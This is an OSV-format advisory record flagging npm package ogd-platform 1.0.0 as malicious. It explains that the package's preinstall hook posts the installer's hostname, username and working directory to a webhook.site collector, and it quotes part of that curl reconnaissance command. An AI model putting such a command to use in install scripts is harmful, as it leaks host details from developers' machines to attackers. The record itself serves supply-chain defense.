{"id":"MAL-2026-5828","summary":"Malicious code in ogd-platform (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (f17f2c263db2adee12698bd9046668b9b674bcdf063b959f54841914a6028931)\nThe package contains only a package.json with a preinstall lifecycle script and ships no actual functionality despite advertising itself as an 'Open Government Data Platform core'. On `npm install`, the preinstall hook runs `curl --data-urlencode \"info=$(hostname && whoami && pwd)\"` against a webhook.site collector URL, sending the installer's hostname, username, and current working directory to an attacker-controlled endpoint. The empty tarball plus recon beacon is the canonical dependency-confusion / namespace-squat reconnaissance shape: an internal build expecting a private `ogd-platform` package would resolve to this public registry entry and leak host identifiers to the attacker on install.\n","modified":"2026-06-15T20:31:51.834131013Z","published":"2026-06-15T20:08:22Z","database_specific":{"malicious-packages-origins":[{"versions":["1.0.0"],"id":"IN-MAL-2026-006699","sha256":"f17f2c263db2adee12698bd9046668b9b674bcdf063b959f54841914a6028931","source":"amazon-inspector","modified_time":"2026-06-15T20:08:22Z","import_time":"2026-06-15T20:14:29.144824987Z"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/ogd-platform/v/1.0.0"}],"affected":[{"package":{"name":"ogd-platform","ecosystem":"npm","purl":"pkg:npm/ogd-platform"},"versions":["1.0.0"],"database_specific":{"indicators":{"package_integrity":[{"filename":"ogd-platform-1.0.0.tgz","hashes":{"sha512_sri":"sha512-YbZgnNGlIru4anZXAR2KnDVHeXIypPq67VhxfEFj/FTGI4QSqSGFcx5KpMyebADUR4AewTq87VJBhBWngwU4Xg==","sha1":"90e93782b00f9d30ed0e1bf2b305fd6a55c6f5e0"}}],"evidence_files":[{"tlsh":"c9d02b945734bb335add46b31ad6a028d7349f4f84849c1e6ec2112452565e1349f37b","sha256":"8e13479f1c02654262c93c30cdb8870a317387e31e5c06266e0c9302919bb10b","path":"package.json"}]},"cwes":[{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"}],"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/ogd-platform/MAL-2026-5828.json"}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}